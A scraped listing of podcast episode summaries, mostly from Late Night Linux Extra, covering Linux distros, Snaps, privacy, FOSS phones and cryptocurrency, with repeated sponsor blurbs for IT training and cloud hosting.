Late Night Linux Extra – Episode 25

Joe is joined by Chris and Gary again to discuss cryptocurrencies, blockchain, and NFTs. Our history, our mistakes, and ultimately why we became jaded about the whole thing.

 

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 24

Joe is joined by Chris and Gary to discuss how we got into Linux around a decade ago, and what would be different for someone getting into it these days.

 

 

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 23

Joe is joined by Chris and listener Orlando to talk about why Arch and derivatives like Artix Linux are perfect for some users.

Chris mentioned a talk called The Tragedy of systemd.

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 22

In this community meetup recording, we discuss what lengths we all go to to protect our privacy.

 

 

Linode

Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 21

In this community meetup recording, we discuss the realities of using a FOSS-only phone.

 

 

Linode

Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 20

In this community meetup recording, we discuss how far we are all willing to go to support people who we switch to Linux.

 

 

Linode

Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 19

Joe is joined by Sean Davis to discuss the his shift from Xfce develpment towards elementary OS, and then we find out that Félim has a lot more tech superstitions than he thought. There is some bad language in this episode.

 

 

Linode

Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.

 

CBT Nuggets

This episode is sponsored by CBT Nuggets – training for IT professionals or anyone looking to build IT skills. Go to cbtnuggets.com/latenightlinux and sign up for a 7-day free trial.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 18

The importance of open source vs open standards, and the best way to move beyond the Linux desktop into servers and headless boxes.

Keep an eye on this page for details of the next community meetup.

 

 

Linode

Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 17

How do we get the next generation of kids into Linux and FOSS? A question we tried to answer in this recording from a community meetup.

 

The next mumble get-together date will be on Friday 26th March at 10pm UK time. Details here.

 

Linode

Simplify your cloud infrastructure with Linode’s Linux virtual machines and develop, deploy, and scale your modern applications faster and more easily. Go to linode.com/latenightlinux and get started with $100 credit.

 

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

 

 

💾

  •  

Late Night Linux Extra – Episode 15

In this recording from the second community meetup we talk about why we use our particular distros including Mint, Manjaro and Solus, and hear from a WSL user who’s relatively new to Linux.

 

 

Datadog

This episode is sponsored by Datadog – the unified monitoring and analytics platform for comprehensive visibility into cloud, hybrid, and multi-cloud environments. Start your Datadog trial today by visiting datadog.com/latenightlinux, create one dashboard, and you’ll get a free Datadog t-shirt.

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 14

Joe is joined by Alan PopeDeveloper Advocate at Canonical working on Snapcraft & Ubuntu to talk about Snaps. The PR problem, the non-free element, security, speed issues, and even some positive stuff. Honest.

Alan posted a transcript of this episode on his blog.

 

 

Datadog

This episode is sponsored by Datadog – the unified monitoring and analytics platform for comprehensive visibility into cloud, hybrid, and multi-cloud environments. Start your Datadog trial today by visiting datadog.com/latenightlinux, create one dashboard, and you’ll get a free Datadog t-shirt.

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 13

What’s likely to happen over the next year in open source, how we evaluate the security and privacy of distros, and more in this recording of the first LNL community meetup.

 

 

Datadog

This episode is sponsored by Datadog – the unified monitoring and analytics platform for comprehensive visibility into cloud, hybrid, and multi-cloud environments. Start your Datadog trial today by visiting datadog.com/latenightlinux, create one dashboard, and you’ll get a free Datadog t-shirt.

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 12

Joe is joined by Brent Gervais, a professional photographer who exclusively uses Linux, to discuss the insights he has gained into the open source mindset during his time as host of Brunch with Brent; including a deep sense of collaboration, and the inherent optimism which occasionally causes issues.

 

 

 

Datadog

This episode is sponsored by Datadog – the unified monitoring and analytics platform for comprehensive visibility into cloud, hybrid, and multi-cloud environments. Start your Datadog trial today by visiting datadog.com/latenightlinux, create one dashboard, and you’ll get a free Datadog t-shirt.

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 11

Joe is joined by former colleague Drew DeVore to talk about his new job as a sysadmin, the ridiculous lengths he goes to in order to use Linux for everything, Fedora and Silverblue, Flatpak and Snaps, WSL, constantly trying out new software, and much more.

 

 

Datadog

This episode is sponsored by Datadog – the unified monitoring and analytics platform for comprehensive visibility into cloud, hybrid, and multi-cloud environments. Start your Datadog trial today by visiting datadog.com/latenightlinux, create one dashboard, and you’ll get a free Datadog t-shirt.

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 10

The Raspberry Pi 400 is here!

Joe is joined by Jim Salter from Ars Technica and 2.5 Admins to discuss his initial impressions, and then Martin Wimpress to talk about Ubuntu Desktop and Ubuntu MATE on the Pi 400 and Pi 4.

 

 

Datadog

This episode is sponsored by Datadog – the unified monitoring and analytics platform for comprehensive visibility into cloud, hybrid, and multi-cloud environments. Start your Datadog trial today by visiting datadog.com/latenightlinux, create one dashboard, and you’ll get a free Datadog t-shirt.

 

 

See our contact page for ways to get in touch.

 

 

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 05

It’s the OggCamp 2018 live show!

 

Joe is joined by Jon Spriggs, Martin Wimpress, Dan Lynch, and Dave Lee at OggCamp.

We spoke about spreading the word about collaboration culture, and how we rationalise using proprietary solutions over open ones.

 

 

See our contact page for ways to get in touch.

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 04

It’s the last episode of LNLE. At least for the time being.

 

 

GIMP 2.10

Jehan Pagès spoke about the latest major release of GIMP, but forgot to plug the film that he’s working on called ZeMarmot.

 

Bad News

This is the last episode of Late Night Linux Extra in its current format.

 

 

 

See our contact page for ways to get in touch.

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 03

Asteroid OS 1.0 and openSUSE Leap 15.

 

Asteroid OS

Florent Revest talks about the recent release of Asteroid OS, the open source operating system for smartwatches.

 

 

openSUSE Leap 15

Richard Brown talks about the recent openSUSE Leap 15 release.

 

 

 

See our contact page for ways to get in touch.

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 02

The new KDE Plasma beta and the future of Xubuntu.

 

KDE Plasma 5.13 beta and Berlin Sprint

Jonathan Riddell talks about the recent KDE sprint in Berlin and the recent beta of Plasma 5.13. We also spoke about running KDE Neon on the Pinebook, and also the Slimbook II.

 

Xubuntu

Sean Davis talks about the future of Joe’s favourite distro, Xubuntu.

 

 

 

See our contact page for ways to get in touch.

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Late Night Linux Extra – Episode 01

A new sister show is born! Joe finds out about the recent Fedora 28 release and the upcoming beta of elementary OS 5.

 

Fedora 28

Matthew Miller talks about the new release of Fedora.

 

elementary OS 5 beta

Daniel Foré talks about the upcoming beta of Juno.

 

 

See our contact page for ways to get in touch.

See the RSS Feeds page for ways to subscribe to the show.

💾

  •  

Linux Dev Time – Episode 148

We get into dependency management. The pros and cons of tools like Dependabot, the varying approaches with different languages and standard library sizes, the times when pinning dependencies makes sense, and more.

 

Turn Dependabot Off

 

 

 

 

 

 

Support us on Patreon and get an ad-free RSS feed with early episodes sometimes

 

See our contact page for ways to get in touch.

Subscribe to the RSS feed

  •  

Hybrid Cloud Show – Episode 54

Aaron and Shane share some thoughts about attending Kubecon, including the push for European sovereign cloud, how platform engineering might mitigate some of the problems AI is causing, the sense that Kubernetes is mature and boring in a good way now, and our concerns about scope creep.

 

Announcing the AI Gateway Working Group

 

 

 

 

 

 

Support us on patreon and get an ad-free RSS feed with early episodes sometimes

 

 

 

 

 

Subscribe to the RSS feed.

  •  
❌